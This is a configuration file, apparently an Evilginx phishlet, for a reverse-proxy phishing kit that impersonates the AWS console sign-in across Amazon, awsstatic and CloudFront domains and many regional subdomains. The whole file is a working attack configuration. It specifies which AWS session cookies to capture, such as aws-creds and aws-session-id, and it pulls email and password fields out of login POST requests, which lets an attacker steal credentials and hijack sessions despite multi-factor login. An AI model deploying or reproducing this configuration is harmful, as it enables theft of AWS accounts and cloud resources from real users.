author: '@An0nud4y' min_ver: '2.3.0' proxy_hosts: - {phish_sub: 'signin.aws', orig_sub: 'signin.aws', domain: 'amazon.com', session: true, is_landing: true, auto_filter: true} - {phish_sub: 'aws', orig_sub: 'aws', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true} - {phish_sub: '', orig_sub: '', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true} - {phish_sub: 'phd.aws', orig_sub: 'phd.aws', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true} - {phish_sub: 'console.aws', orig_sub: 'console.aws', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true} - {phish_sub: 'portal.aws', orig_sub: 'portal.aws', domain: 'amazon.com', session: true, is_landing: false, auto_filter: true} - {phish_sub: 'aws-signin-website-assets.s3', orig_sub: 'aws-signin-website-assets.s3', domain: 'amazonaws.com', session: true, is_landing: false, auto_filter: true} - {phish_sub: 'cdn.assets.as2', orig_sub: 'cdn.assets.as2', domain: 'amazonaws.com', session: true, is_landing: false, auto_filter: true} - {phish_sub: 'opfcaptcha-prod.s3', orig_sub: 'opfcaptcha-prod.s3', domain: 'amazonaws.com', session: true, is_landing: false, auto_filter: true} - {phish_sub: 'a.b.cdn.console', orig_sub: 'a.b.cdn.console', domain: 'awsstatic.com', session: true, is_landing: false, auto_filter: true} - {phish_sub: 'd1', orig_sub: 'd1', domain: 'awsstatic.com', session: true, is_landing: false, auto_filter: true} - {phish_sub: 'd2eezf66cfmyv', orig_sub: 'd2eezf66cfmyv', domain: 'cloudfront.net', session: true, is_landing: false, auto_filter: true} ## SUBDOMAINS BASED ON GEO LOCATION. - {phish_sub: 'us-east-1.console.aws', orig_sub: 'us-east-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} - {phish_sub: 'us-east-2.console.aws', orig_sub: 'us-east-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} - {phish_sub: 'us-west-1.console.aws', orig_sub: 'us-west-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} - {phish_sub: 'us-west-2.console.aws', orig_sub: 'us-west-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} - {phish_sub: 'af-south-1.console.aws', orig_sub: 'af-south-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} - {phish_sub: 'ap-east-1.console.aws', orig_sub: 'ap-east-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} - {phish_sub: 'ap-south-1.console.aws', orig_sub: 'ap-south-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} - {phish_sub: 'ap-northeast-3.console.aws', orig_sub: 'ap-northeast-3.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} - {phish_sub: 'ap-northeast-2.console.aws', orig_sub: 'ap-northeast-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} - {phish_sub: 'ap-southeast-1.console.aws', orig_sub: 'ap-southeast-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} - {phish_sub: 'ap-southeast-2.console.aws', orig_sub: 'ap-southeast-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} - {phish_sub: 'ap-northeast-1.console.aws', orig_sub: 'ap-northeast-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} - {phish_sub: 'ca-central-1.console.aws', orig_sub: 'ca-central-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} - {phish_sub: 'eu-central-1.console.aws', orig_sub: 'eu-central-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} - {phish_sub: 'eu-west-1.console.aws', orig_sub: 'eu-west-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} - {phish_sub: 'eu-west-2.console.aws', orig_sub: 'eu-west-2.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} - {phish_sub: 'eu-south-1.console.aws', orig_sub: 'eu-south-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} - {phish_sub: 'eu-west-3.console.aws', orig_sub: 'eu-west-3.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} - {phish_sub: 'eu-north-1.console.aws', orig_sub: 'eu-north-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} - {phish_sub: 'me-south-1.console.aws', orig_sub: 'me-south-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} - {phish_sub: 'sa-east-1.console.aws', orig_sub: 'sa-east-1.console.aws', domain: 'amazon.com', session: false, is_landing: false, auto_filter: true} sub_filters: - {triggers_on: 'signin.aws.amazon.com', orig_sub: '', domain: 'amazon.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'signin.aws.amazon.com', orig_sub: '', domain: 'amazonaws.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'signin.aws.amazon.com', orig_sub: '', domain: 'awsstatic.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} - {triggers_on: 'signin.aws.amazon.com', orig_sub: '', domain: 'cloudfront.net', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} auth_tokens: - domain: '.amazon.com' keys: ['aws-ubid-main', 'aws-userInfo-signed', '.*,regexp'] - domain: '.aws.amazon.com' keys: ['awsm-vid,opt', 'awsccc', '.*,regexp'] - domain: '.console.aws.amazon.com' keys: ['noflush_Region', 'noflush_awscnm', '.*,regexp'] - domain: '.signin.aws.amazon.com' keys: ['aws-signin-csrf', 'aws-signin-account-info', 'aws-creds', '.*,regexp'] - domain: 'phd.aws.amazon.com' keys: ['aws-creds-code-verifier', 'aws-consoleInfo', 'aws-creds', '.*,regexp'] - domain: 'portal.aws.amazon.com' keys: ['aws-session-id-fallback,opt', 'aws-session-id', 'JSESSIONID', '.*,regexp'] - domain: 'signin.aws.amazon.com' keys: ['JSESSIONID', '.*,regexp'] auth_urls: - '/console/home' credentials: username: key: 'email' search: '(.*)' type: 'post' password: key: 'password' search: '(.*)' type: 'post' login: domain: 'signin.aws.amazon.com' path: '/signin?redirect_uri=https%3A%2F%2Fconsole.aws.amazon.com%2Fconsole%2Fhome%3Ffromtb%3Dtrue%26hashArgs%3D%2523%26isauthcode%3Dtrue%26state%3DhashArgsFromTB_us-east-1_7de15f551561e8cc&client_id=arn%3Aaws%3Asignin%3A%3A%3Aconsole%2Fcanvas&forceMobileApp=0&code_challenge=yjMoqMdgfMR1J8rPfy4CI_50b3PldrJjTsFRPOFWJ9A&code_challenge_method=SHA-256'